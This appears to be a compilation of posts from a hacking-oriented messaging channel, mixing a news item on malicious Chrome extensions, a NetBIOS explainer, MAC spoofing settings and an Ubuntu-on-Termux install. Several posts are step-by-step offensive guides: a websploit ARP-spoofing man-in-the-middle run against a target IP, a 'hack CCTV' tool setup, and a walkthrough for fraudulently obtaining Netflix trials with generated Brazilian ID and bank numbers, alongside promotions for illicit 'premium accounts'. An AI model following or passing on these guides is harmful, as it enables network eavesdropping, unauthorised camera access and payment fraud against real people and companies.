▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Chrome malicious extension steals personal data and has been downloaded over 30 million times
#News !!!

> Google’s Chrome Web Store was hit by the largest surveillance activity to date. As of May 2020, the campaign successfully stolen data from users worldwide by downloading malicious extensions more than 32 million times.

> Awake's security threat research team released a research report stating that it discovered a large-scale global surveillance campaign that used the nature of Internet domain registration and browser capabilities to monitor and steal from multiple regions and industry segments User data. Research shows that this criminal activity is promoted by a single Internet domain registrar: CommuniGal Communication Ltd. (GalComm).

> And said that by using the trust as a domain name registrar, GalComm has enabled malicious activity, and the malicious activity has been found in more than one hundred networks inspected. In addition, even in complex organizations that have invested heavily in cybersecurity, malicious activities can be hidden by bypassing multiple layers of security controls.

> Awake pointed out in the report that there are 26,079 accessible domains registered through GalComm, of which more than 15,000 domains are malicious or suspicious.

> In the past three months alone, it has collected 111 malicious or forged Chrome extensions using GalComm domains, which are used for attacker's command and control infrastructure and/or as loader pages for extensions. These extensions can take screenshots, read the clipboard, get credential tokens stored in cookies or parameters, and get user keystrokes (such as passwords).

🦑Examples of tricks to install malicious Chrome extensions

> As of May 2020, the number of downloads of these 111 malicious extensions has reached 32,962,951 times. Awake said the company has partnered with Google to remove these extensions from the Chrome Web Store.

In response to this, Moshe Fogel, the person in charge of GalComm, stated in a communication with Reuters, “GalСomm is not involved in any malicious activities. It can be said that on the contrary, we cooperate with law enforcement and security agencies to do our best to prevent them.” After Awake Security published a report and listed all suspicious domain names, Moshe Fogel also said that the use of these domain names was almost inactive and would continue to investigate other domain names.

@UNdercodeNews
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑MITM ATTACK VIA TERMUX BEST WAY 2020 :

? man-in-the-middle attack (MITM),
> also known as a hijack attack is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. One example of a MITM attack is active eavesdropping, in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker

WELL HOW TO DO ?

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣$ git clone https://github.com/websploit/websploit.git

2️⃣$ cd websploit

3️⃣$ python setup.py install

4️⃣Select module :

wsf > use arp_spoof
with options command you can see options of current module:

wsf > arp_spoof > options
Change options with set command:

wsf > arp_spoof > set target 192.168.1.24
Finally run module via execute command:

wsf > arp_spoof > execute

🦑STILL GE TROUBLE ?

CHECK THIS VID : https://www.youtube.com/watch?v=hqbi86I6KhU

Share us❤️👍🏻
✅Topic sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

Promotion for premium ACCOUNTS

WORKING

Join
@PremiumHostTG
Enjoy & Have a good Sunday EveryOne

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑INSTALL UBUNTU ON TERMUX WITHOUT ROOT :
FASTEST WAY :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣Update termux: apt-get update && apt-get upgrade -y

2️⃣Install wget: apt-get install wget -y

3️⃣Install proot: apt-get install proot -y

4️⃣Install git: apt-get install git -y

5️⃣Go to HOME folder: cd ~

6️⃣Download script: git clone https://github.com/MFDGaming/ubuntu-in-termux.git

7️⃣Go to script folder: cd ubuntu-in-termux

8️⃣Give execution permission: chmod +x ubuntu.sh

9️⃣Run the script: ./ubuntu.sh -y

🔟Now just start ubuntu: ./startubuntu.sh

Share us❤️👍🏻
✅Topic sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

I saw many sellers they sell our stuff & open sources & accounts from @premiumhostTG

AND THEY COMBINE OUR STUFF IN GB SHIT LINKS AND SEND 🤣🤣🤣🤣

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑ALL YOU NEED TO KNOW ABOUT SIDE-CHANNEL ATTACK :

WHAT IS SIDE-CHANNEL ATTACK ?

> Side-channel attacks are all threats focused on knowledge obtained from the computer program execution, rather than flaws in the code itself (e.g. cryptanalysis and device bugs). Timing information, power use, electromagnetic interference, or even sound can provide an additional source of information that can be used.


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

A SMALL GUIDE FOR THIS 2020 TOOL :
Using Unicorn as a basis, Rainbow aims to provide an easy scripting interface to loosely emulate embedded binaries, trace them to perform side-channels, and (sometime in the near future :) )simulate fault injections.
-This is to allow quick and easy testing of physical attack resistance of code snippets, in order to help developers have a first evaluation of the resistance of their code.

1️⃣git clone https://github.com/Ledger-Donjon/rainbow.git

2️⃣cd rainbow

3️⃣python3 setup.py install

4️⃣Examples:

In the ./examples/ folder, you will find:

➕x64_pimpmyxor.py : basic emulation of this challenge
➕CortexM_AES : a simple ARM Thumb AES
➕Hacklu2009 : a side-channel solution of a whitebox challenge
➕HW_analysis : a side-channel simulation of a pin comparison, and a fault injection simulation
➕ledger_ctf2 : side-channel solution of a whitebox challenge
➕OAES : an x86 whitebox tracing example that discards useless instructions
➕SecAESSTM32 : a starting point to test ANSSI's STM32 secure AES implementation

5️⃣Grab a device or generic emulator like so

from rainbow.devices import rainbow_stm32f215
from rainbow.generics import rainbow_x86

e = rainbow_stm32f215(sca_mode=False)

> Loading a binary

e.load('file', typ='.elf')
File type is guessed on the extension when possible (.elf, .hex).

6️⃣Starting the emulation is done like so:

e.start(start_address, stop_address, count=number_of_instructions)
Just like with unicorn. The underlying Unicorn instance is always available as e.emu.

🦑More : 1 h 22 min

https://m.youtube.com/watch?v=3v5Von-oNUg

🦑related advanced tools https://github.com/Ledger-Donjon/lascar

Share us❤️👍🏻
✅Topic sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Netflix accounts new methode :

1️⃣ Get a VPN and a new browser to preserve your identity.

nordvpn or sock5 or any trial good anonymous services

2️⃣ Netflix for polland or brazil

Google. In this way the connection starts from Brazil by a legitimate search on Google.com.br

netflix will open as brazil or polland depend on option you choose

Once you enter the site you have to sign up for the 1 month trial.

3️⃣Signing up

Choose one of the plans you 'd like the most. As you won't have to pay for it, you can also pick

This profile enables you to link to Ultra HD concurrently for a span of one month.

4️⃣You will need a temporary email to signup. I can recommend using https://temp-mail.org/ which allows you to generate an email of your choice without registration

5️⃣Choose a password for your Netflix account, now you will be asked for a payment method..

6️⃣ Payment method

Select "Debito Em Conta" as form of payment. This approach can be interpreted as "simple bank debit"

Bank



You'll set both values like a bank account number such that Netflix knows you 're a Brazilian citizen and



You have a bank account which is valid.



Visit https:/www.4devs.com.br / gerador de cpf and generate a number for your CPF. Please ensure "SP" is set as



"Early stadium do CPF." Export the CPF into the billing form for Netflix ..



Now visit https:/www.situacaocadastral.com.br/ and paste the same CPF even with a name it returns you.



Title then you can move ahead with the tutorial, then you have to move back to the start of stage 4, then repeat the test!!

cardingteam.cc

The last thing to copy is bank account, and it is the one that gives more trouble, but we found a way to

obtain it too.

1) Visit https://www.4devs.com.br/gerador_conta_bancaria

2) Pick “Caixa”, “Bradesco” or “Santander” as Banco, pick “SP” as Estado. (Caixa is recommended)

3) Keep generating bank account until you get one that begins with “001”, “013”, “023” or “037”


If you receive an account that starts with 1 of these 4 approved variations, you will copy the account

Amount inside the Netflix website and paste it (remember "Agencia").

You 're able to get started. Netflix will be offering you her warm welcome to the service at this stage. You've done it!

This account lasts 1 month, and can be transferred to some other language account by heading to

"My profile" and then "english" and pick the one you want.

Here are some profiles that we have created over the past 2 days, that will last 1 full month ...

Repeat after expiry cycle for more!

enjoy ❤️👍🏻
rewritten
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is NetBIOS?

NetBIOS (Network Basic Input / Output System) is a protocol for working in local networks on personal computers such as IBM / PC, developed as an interface that is independent of the manufacturer. It was developed by Sytek Corporation by order of IBM in 1983. It includes a session-level interface (Eng. NetBIOS interface), uses TCP and UDP as transport protocols.

🦑MORE DETAILS :

1️⃣Applications can find through NETBIOS the resources they need, establish a connection and send or receive information. NETBIOS uses port 137 for the name service, port 138 for the datagram service, and port 139. For sessions, any session begins with a NETBIOS request, specifying the IP address and determining the TCP port of the remote object, followed by the exchange of NETBIOS messages, after bringing the session to a close. The session exchanges information between two NETBIOS applications.

2️⃣The message length ranges from 0 to 131071 bytes. The simultaneous establishment of several sessions between two objects is acceptable. When organizing IP transport via NETBIOS, the IP datagram is embedded in the NETBIOS packet. Information exchange occurs in this case without establishing a connection between the objects. NETBIOS names must contain IP addresses.

3️⃣So, part of the NETBIOS address can be of the form IP. . . . , where IP indicates the type of operation (IP via Netbios), and . . . is the IP address. NETBIOS system has its own system of commands (call, listen, hang up, send, receive, session status, reset, cancel, adapter status, unlink, remote program load) and primitives for working with datagrams (send datagram, send broadcast datagram, receive datagram , receive broadcast datagram). All NETBIOS end nodes are divided into three types:

1) Broadcast (“b”) nodes

2) point-to-point nodes (“p”);

3) nodes of the mixed type ("m").

4) An IP address can be associated with one of these types. B-nodes communicate with their partner through broadcast requests. P and M nodes use netbios name server (NBNS) and datagram distribution server (NBDD) for this purpose.

🦑NetBIOS provides:

1) registration and verification of network names;

2) establishing and breaking connections;

3) communication with the confirmation of the delivery of information;

4) communication without confirmation of delivery of information;

5) support for managing and monitoring the driver and network card.

Share us🦑👍🏻
Written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑Spoofing (spoofing) MAC addresses in NetworkManager
NetworkManager can reassign MAC installed by other programs

Starting with NetworkManager 1.4.0, this program supports MAC spoofing, and has many different options.

So that we can understand them, we need to understand some concepts.

First, network adapters are:

1) wired ( ethernet );

2) wireless ( wifi )

each group, MAC rules are configured separately

🦑Secondly, a wireless adapter can be in two states:

1) scan (search, not connected to the network) - set using the wifi.scan-rand-mac-address property , set to yes by default , which means that it sets an arbitrary MAC address during the scan. Another valid value is no ;

2) connected to the network - set using the wifi.cloned-mac-address property , the default value is preserve

🦑The following values ​​(modes) are available for the wired interface (set by the ethernet.cloned-mac-address property ) and the wireless interface in the connected state (set by the wifi.cloned-mac-address property ):

1) explicit MAC address (i.e., you can write down the desired value that will be assigned to the network interface)

2) permanent : use the device’s embedded MAC address
preserve : do not change the MAC address of the device after activation (for example, if the MAC was changed by another program, the current address will be used)

3) random : generate a random value for each connection
stable : similar to random - i.e. generate a random value for each connection, BUT when connecting to the same network the same value will be generated

4) NULL / not set : this is the default value that allows you to roll back to the global default settings. If global settings are not set, then NetworkManager rolls back to preserve .


ENJOY ❤️👍🏻
Written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK CCTV VIA LINUX TERMUX 2020 UPDATE
#Requested
fastest way

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣apt-get install python3

2️⃣apt-get install git

3️⃣git clone https://github.com/AngelSecurityTeam/Cam-Hackers

4️⃣pip3 install requests

5️⃣cd Cam-Hackers

6️⃣python3 cam-hackers.py

7️⃣choose options via numbers

ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫6𝔬𝓓ⓔ ▄ ▂ ▁